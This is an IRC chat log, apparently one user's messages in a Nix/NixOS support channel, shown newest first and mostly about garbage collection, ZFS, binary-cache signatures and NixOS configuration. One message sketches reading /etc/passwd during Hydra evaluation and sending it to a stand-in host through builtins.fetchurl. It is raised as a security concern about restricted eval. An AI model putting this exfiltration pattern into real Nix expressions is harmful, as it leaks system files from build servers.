<clever>
chreekat: you would want to add an override in config.nix that does the changes, then install the overridden version
<clever>
nix-env -iA nixos.sqliteInteractive
<clever>
chreekat: there is already a sqliteInteractive package that turns that flag on
<clever>
chreekat: one min
<clever>
steveeJ: i think it will set errno to EIO and the read will fail
<clever>
steveeJ: and also, zfs has its own consistency checks, every block of data on the drive is hashed, and the hash is verified at read time, so it cant return corrupt data to the applications
<clever>
steveeJ: yeah
<clever>
steveeJ: eek!
<clever>
gchristensen: good :)
<clever>
gchristensen: ah, i can test that on my end first and see if i have any way out
<clever>
gchristensen: hmmm, and if you approve a PR, what happens when i push more commits to the branch?
<clever>
gchristensen: wont your eval execute that?, or is restricted mode going to block the fetchurl?
<clever>
gchristensen: what if i query a specialy crafted url like builtins.fetchurl ("example.com/" + encode(builtins.readFile /etc/passwd)) ?
<clever>
nh2[m]: from what ive heard about the docker stuff, its often due to people improperly mounting a part of the host fs into the guest with special flags
<clever>
nh2[m]: recursive nix would let you 'nix-build' the code inside of an existing nix sandbox, which would be perfect
<clever>
nh2[m]: yeah
<clever>
steveeJ: ive also see apps claiming a file doesnt exist when it clearly does, because of 32bit vs 64bit interactions
<clever>
steveeJ: ive seen more nasty bugs before in filesystems, where fsck said everything was fine, but directories would just randomly map to other directories
<clever>
and if you have a fixed-output derivation, you have full network access
<clever>
domenkozar: i suspect that the restricted eval mode that hydra uses might be able to stop some nasty things, but it may still allow a simple src = /etc/passwd;
<clever>
steveeJ: ah, that would do it
<clever>
yeah, that is strange
<clever>
BlessJah: is that in nix-shell or a normal shell?
<clever>
steveeJ: "strace -ff -o /tmp/logfiles nix-collect-garbage" can you try this, then gist all of the logfiles it makes
<clever>
steveeJ: ah, if you have +w to /nix/store, then the user doesnt matter
<clever>
steveeJ: is this being ran as root or a normal user?
<clever>
steveeJ: try nix-collect-garbage instead, its a different command
<clever>
steveeJ: can you gist the command you ran and all of its output?
<clever>
steveeJ: why cant you use nix-collect-garbage?
<clever>
steveeJ: it sounds a lot more like you ran nix-build on something
<clever>
steveeJ: thats a file!!, why is it trying to find the default.nix under a file?
<clever>
-r--r--r-- 1 root root 1.3K Dec 31 1969 /nix/store/v8cnl344mjh4qb60j47rw7yh4vsy59mx-tzdata-2016j/share/zoneinfo/Asia/Sakhalin
<clever>
steveeJ: that doesnt sound right at all
<clever>
steveeJ: what path exactly did it complain about?
<clever>
steveeJ: when the gc is fully finished, it will just recursively delete the whole trash
<clever>
steveeJ: so a partially deleted storepath doesnt get seen by an application
<clever>
steveeJ: nix-store --gc and nix-collect-garbage will use the rename() syscall to move whole storepaths into /nix/store/trash, because it can atomicly remove it from /nix/store/
<clever>
you would need to patch setup.sh, which involves a mass-rebuild
<clever>
ahh
<clever>
myrl: NIX_BUILD_CORES is based on the build-cores in nix.conf
<clever>
tommyangelo[m]: the next `nixops deploy` should run `nix-build` and re-build everything from the expressions
<clever>
but if it never gets root, then nix-daemon acts as a gatekeeper
<clever>
ive seen people run into problems with db.sqlite getting upgraded
<clever>
because ive been careful to never give nixUnstable root
<clever>
ah, its on my normal user, but not root
<clever>
dont see it on my systems
<clever>
that file is new to me
<clever>
yeah, thats the one that should work
<clever>
sphalerite: how did you generate the pair?
<clever>
sphalerite: its also plausible that you have the wrong public key, double-check that you signed it with the right key?
<clever>
ive also found some bugs in "nix copy" that ask for signatures when it shouldnt
<clever>
that might help
<clever>
so all nix commands fail
<clever>
but there is no error handling to wipe it in the case of corruption
<clever>
its a cache cache and can be regenerated, so somebody turned off a vital option in sqlite, allowing the db to become corrupt (for more performance)
<clever>
ive also seen a bug many years ago that entirely broke nix
<clever>
nix will regenerate that db when its missing
<clever>
yeah
<clever>
sphalerite: looks fine, my only guess would be the cache cache in /nix/var/nix/binary-cache-v3.sqlite
<clever>
sphalerite: and what do you have in nix.conf?
<clever>
sphalerite: can you gist the narinfo or paste a link to it?
<clever>
knedlsepp: what about something like proot and mount namespacing to put nix back at /nix/ ?
<clever>
knedlsepp: i think a fixed fixed-output expects the sha256 in the derivation to be the regular sha256 of the file, but the storepath itself still has more layers
<clever>
knedlsepp: there is also a difference between flat and recursive fixed-outputs
<clever>
sphalerite: and that .narinfo contains the path of the .nar and the signature
<clever>
sphalerite: for a given /nix/store/<hash>-<name>, the binary cache will have a <hash>.narinfo file
<clever>
knedlsepp: once a file enters the store, it must never be modified again
<clever>
knedlsepp: one min
<clever>
sphalerite: do you see a signature in the .narinfo of that path?
<clever>
srhb: run nixos-install under "strace -ff -o /tmp/logfiles -s 5000" and then check the execve's in the logs to see what it failed to find
2017-11-19
<clever>
the only issue with the read-cache part of ZFS, is that the cache doesnt persist across reboots
<clever>
Thra11_: but some filesystems like ZFS can use an SSD as a read-cache for another larger disk
<clever>
Thra11_: nix requires that the entire store exist on the same filesystem
<clever>
yeah
<clever>
joepie91: the issue there, is that nix makes the updates atomic, you either get no changes, or you get everything changing at once
<clever>
joepie91: obadz: the exact (old) version of the game you already have built, is now in the users profile, and you wont loose it after taking it out of systemPackages
<clever>
obadz: also, you can grab the storepath of the game, and run "nix-env -i /nix/store/foo" on that
<clever>
joepie91: so you can then use normal -j to build the engine while downloading
<clever>
joepie91: one option, is to build the engine in a single derivation, that has no dependency on the data, then have a second derivation, that depends on a 1gig fetchurl, and throws a bash script around the engine, saying where to find the data
<clever>
doublehp: is it the exact same version that nix is expecting?, the hash must match
<clever>
doublehp: your supposed to run nix-store --add-fixed sha256 on the file to add it to the store
<clever>
tilpner: pkgs.fetchurl also supports mirrors and a few other options
<clever>
tilpner: in the stable nix, it doesnt support a sha256
<clever>
liketechnik: you need to use pkgs.fetchurl
<clever>
imagio: ah
<clever>
ekleog: there is also a network.target and network-online.target
<clever>
imagio: oops, that was for you
<clever>
ixxie: and append the default pulse config with my custom one
<clever>
ixxie: i had to do this: configFile = pkgs.runCommand "config.pa" {} "cat ${./default.pa} ${./extra.pa} > $out";
<clever>
andrewrk: yeah
<clever>
andrewrk: is /boot mounted when you do a switch?
<clever>
nixpkgs still uses a perl and bash everywhere
<clever>
toppler: within nix itself
<clever>
toppler: c++
<clever>
toppler: the perl has been purged
<clever>
nixos-generate-config adds those devices to hardware-configuration.nix, without the compression config, and then adds with zram, and tries to enable the same devices twice
<clever>
zram adds some special block devices as swap, to compress the data and store it back in ram
<clever>
oh, another more crippling bug, the zram stuff
<clever>
its a variable that changes depending on state, that could be improved
<clever>
sphalerite: its not checking if /mnt depends on usb, just that you have a usb device
<clever>
and if you remove the usb device and re-generate, it takes away usb support
<clever>
nixos-generate-config
<clever>
sphalerite: if you have a mass-storage device plugged in when you generate the config, it puts mass-storage support into the initrd
<clever>
sphalerite: oh, and it has an impurity involving usb
<clever>
and nixos-generate looks at the mounts under /mnt
<clever>
tank-root (the lvm LV) has no direct link to tank/root (the zfs device)
<clever>
sphalerite: lsblk cant connect / to the zfs backing device
<clever>
sphalerite: oh wait, i think i see the issue
<clever>
sphalerite: ah, that does correctly follow the zfs on lvm on luks
<clever>
because the luks isnt in the output of "mount"
<clever>
Dezgeg: but it cant find the luks under an lvm
<clever>
Dezgeg: that reminds me, nixos-generate-config can find luks devices and register them in the config properly
<clever>
myrl: what is in /etc/resolv.conf ?
<clever>
educated guess, based on the drv path and the other drv's that fail
<clever>
but those only name the name, not the attrpath or nix file
<clever>
it will sometimes show .drv files after that
<clever>
thats not an error from nixexpr, so --show-trace wont help
<clever>
myrl: what error did it give?
<clever>
nix-build --option binary-caches ""
<clever>
myrl: you can override any nix.conf flag with --option
<clever>
myrl: change the value of binary-caches = in /etc/nix/nix.conf
<clever>
myrl: some font packages are specially written so they can go into the binary cache
<clever>
trikl[m]: behind the scenes, nix-channel uses nix-env to install the new channel into your channel profile
<clever>
sphalerite: some phones have hdmi output, even if you think its just USB
<clever>
sphalerite: and yes, i have rescued 4 year old projects from those backups
<clever>
sphalerite: and i have at least a dozen harddrive images from old installs
<clever>
sphalerite: ive found old harddrive backups, in old harddrive backups
<clever>
lol
<clever>
builder for ‘/nix/store/wla89i87v87pbwq5kyn5g2qvmr40a4dx-fail-4.9.0.0.drv’ failed with exit code 1
<clever>
myrl: i use the youtube notifications as a "plan to watch" list
<clever>
myrl: i do the same thing with notifications, lol
<clever>
i had a crazy idea for a new slack bot, hoogle, with a custom package set
<clever>
toppler: lib.recursiveUpdate
2017-11-18
<clever>
if you know the right one, you can just slip in :P
<clever>
and half the windows dont latch right either
<clever>
and i recently discovered the secondary door hadnt been locked in over a year
<clever>
and also, i live in the middle of nowhere, the main door is almost never locked
<clever>
ive found packages just sitting on the door step on many occasions
<clever>
oh, and on the topic of deliveries like that
<clever>
so even if you deauth, the video will still go up eventualy, and now your caught on film
<clever>
hyper_ch: i can think of 2 things to help prevent this issue, a: record video on the camera, and resend lost video to a central machine (not just realtime), b: moar cameras!
<clever>
its just plain old deauth
<clever>
and a few paragraphs down, its not even jamming
<clever>
hence why i avoid wifi whenever possible
<clever>
just spam the airwaves and it goes down
<clever>
hyper_ch: half way into the 2nd paragraph, i'm thinking, wifi jammer
<clever>
the ethernet never worked for me
<clever>
oh, it does have an ethernet driver i could disable
<clever>
its at 36mb now i think
<clever>
i stuffed it with as many sticks as it could handle and still boot
<clever>
maybe 2
<clever>
4 or less i think
<clever>
it now has enough ram, but still fails to start, no error, just hangs on startup
<clever>
yeah
<clever>
but i found some spare sticks laying around
<clever>
it came with so little ram that duke nukem failed to start
<clever>
i didnt think it even had enough ram to handle 95